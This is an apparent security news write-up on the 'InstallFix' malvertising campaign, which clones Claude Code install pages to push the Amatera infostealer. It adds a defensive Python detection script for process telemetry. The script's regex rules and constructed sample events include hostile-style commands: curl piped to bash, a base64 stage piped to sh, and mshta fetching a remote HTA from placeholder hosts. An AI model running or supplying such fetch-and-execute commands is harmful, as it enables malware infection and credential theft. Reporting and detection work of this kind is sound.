InstallFix Uses Fake Claude Code Pages to Deliver Malware
Push Security research identified an "InstallFix" campaign that uses Google-sponsored ads to surface cloned installation pages for Anthropic's Claude Code, replacing the legitimate one-line install command with attacker-controlled commands that deploy infostealer malware. Malwarebytes and SecurityWeek detail that the primary payload observed in these incidents is the Amatera Stealer, which exfiltrates browser cookies, saved passwords, session tokens, and other credentials. Researchers found the campaign targets both Windows and macOS users, hosts malicious content on legitimate hosting platforms including Cloudflare Pages and Squarespace, and has also abused public repositories and package registries, according to SecurityWeek and Malwarebytes. Push Security and Help Net Security note that the attack combines a common developer habit, copying install one-liners from documentation pages, with malvertising that bypasses email-based defenses.
What happened
Push Security published research documenting an attack pattern it calls InstallFix, in which threat actors clone installation or documentation pages for popular developer tools and replace the visible install one-liner with a malicious command. The campaign has targeted pages mimicking Anthropic's Claude Code install documentation, surfacing the cloned pages through Google-sponsored search results, according to Push Security and reporting in Dark Reading and Help Net Security. When victims copy and paste the malicious one-liner, the command fetches and executes code from attacker-controlled infrastructure, resulting in deployment of an information-stealing payload, researchers observed, with Malwarebytes and SecurityWeek identifying the primary payload as the Amatera Stealer.
Technical details
Security researchers documented platform-specific execution chains. On macOS, the malicious one-liner often retrieves an obfuscated second-stage script that decodes base64, downloads a binary, sets executable attributes, and launches it, Malwarebytes reported. On Windows, researchers observed commands that spawn cmd.exe and mshta.exe to retrieve and execute remote code, SecurityWeek noted. Push Security also documented abuse of legitimate hosting and distribution channels, including Cloudflare Pages, Squarespace, Tencent EdgeOne, public pages on claude.ai, GitHub repositories, NPM packages, and Homebrew clones, which helps the fake pages blend into normal web traffic.
Industry context
Editorial analysis: Companies and users that rely on copy-paste one-line installers for developer tools increase their exposure to execution of attacker-supplied commands and to malvertising-based social engineering. Industry reporting frames this as an evolution of ClickFix-style tricks into an InstallFix variant that specifically targets developer workflows and the growing popularity of AI coding assistants.
Context and significance
Editorial analysis: The campaign matters because it combines two amplifiers: malvertising to reach many searchers quickly, and developer installation habits that treat a website-provided one-liner as authoritative. For enterprises, stolen browser credentials, session tokens, and saved passwords are high-value for lateral movement and cloud access compromise, a point emphasized across Malwarebytes, SecurityWeek, and Help Net Security coverage.
What to watch
Editorial analysis: Observers should track three indicators highlighted in the reporting: malvertising activity tied to search-engine sponsored links; reuse of hosting platforms like Cloudflare Pages and content-management services for cloned pages; and increased targeting of package registries and public repos for trojanized installers. Push Security's ongoing posts and security vendor telemetry (Malwarebytes, SecurityWeek) are the primary near-term sources for new indicators and IOCs.
For practitioners
Editorial analysis: Defensive teams should view this as a reminder to limit credential reuse, monitor for anomalous OAuth or session use, and increase awareness that web-sourced one-liner installs bypass many traditional email-based protections. Vendor and researcher reporting indicates attackers are leveraging mainstream ad channels and legitimate hosting to evade simple content-blocking approaches, so detection should include URL vetting for sponsored search results and monitoring outbound connections that follow local command execution.
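The execution chains described under Technical details (a remote script piped into a shell, a base64-decoded stage piped into a shell, and cmd.exe spawning mshta.exe with a remote URL) and the monitoring advice above can be turned into simple process-creation detection rules. The following is an added example written for this page, not code from Push Security, Malwarebytes, or any other vendor named here; the host names, URLs (all under the reserved .invalid domain), and process events are constructed sample telemetry, and the rule names are hypothetical.

```python
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    """One process-creation record: host, parent image, child image, command line."""
    host: str
    parent_image: str
    image: str
    cmdline: str


@dataclass
class Alert:
    host: str
    rule: str
    cmdline: str
    urls: list = field(default_factory=list)  # remote endpoints worth correlating with egress logs


# Command-line patterns for the chains described in the reporting.
CMDLINE_RULES = [
    # curl/wget output piped straight into a shell (the macOS one-liner shape)
    ("remote-script-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    # base64-decoded blob piped into a shell (the obfuscated second stage)
    ("base64-decode-to-shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    # mshta.exe handed a remote URL (the Windows chain)
    ("mshta-remote-url",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
]

URL_RE = re.compile(r"https?://[^\s\"'|;]+", re.I)


def _basename(path: str) -> str:
    # Handles both Windows and POSIX separators.
    return re.split(r"[\\/]", path)[-1].lower()


def detect(events):
    """Return one Alert per (event, matching rule)."""
    alerts = []
    for ev in events:
        urls = URL_RE.findall(ev.cmdline)
        for name, pattern in CMDLINE_RULES:
            if pattern.search(ev.cmdline):
                alerts.append(Alert(ev.host, name, ev.cmdline, urls))
        # Parent/child check is independent of how the command line is worded.
        if _basename(ev.parent_image) == "cmd.exe" and _basename(ev.image) == "mshta.exe":
            alerts.append(Alert(ev.host, "cmd-spawns-mshta", ev.cmdline, urls))
    return alerts


# Constructed sample events (not real telemetry); the base64 string is an arbitrary
# placeholder and the URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent("mac-dev-01", "/Applications/iTerm.app/Contents/MacOS/iTerm2", "/bin/bash",
              'bash -c "curl -fsSL https://installer.example.invalid/s | bash"'),
    ProcEvent("mac-dev-01", "/bin/bash", "/bin/bash",
              'bash -c "echo Y3VybCAtbyAvdG1wLy5hIGh0dHBzOi8vZXhhbXBsZS5pbnZhbGlkL2I= | base64 -d | sh"'),
    ProcEvent("win-dev-07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://cdn.example.invalid/i.hta"),
    # Benign: download to a file for inspection, nothing piped into a shell.
    ProcEvent("mac-dev-02", "/Applications/iTerm.app/Contents/MacOS/iTerm2", "/usr/bin/curl",
              "curl -fsSL https://tool.example.invalid/install.sh -o install.sh"),
    # Benign: ordinary git clone from explorer-launched shell.
    ProcEvent("win-dev-03", r"C:\Windows\explorer.exe", r"C:\Program Files\Git\bin\git.exe",
              "git clone https://git.example.invalid/org/repo"),
]


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.host}] {a.rule}: {a.cmdline}  urls={a.urls}")
```

The benign events show the design intent: downloading an installer to disk and reading it before running it does not trigger the rules, while piping a fetched or decoded stream straight into a shell does. The `urls` field is there so an alert can be joined against proxy or DNS logs to confirm the outbound connection that followed the command, which is the correlation the advice above calls for.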
Scoring Rationale
The campaign is a notable operational threat to developers and organizations because it exploits common installation habits and uses mainstream ad channels, but it is not a new paradigm. Coverage from multiple vendors raises its operational priority for defenders.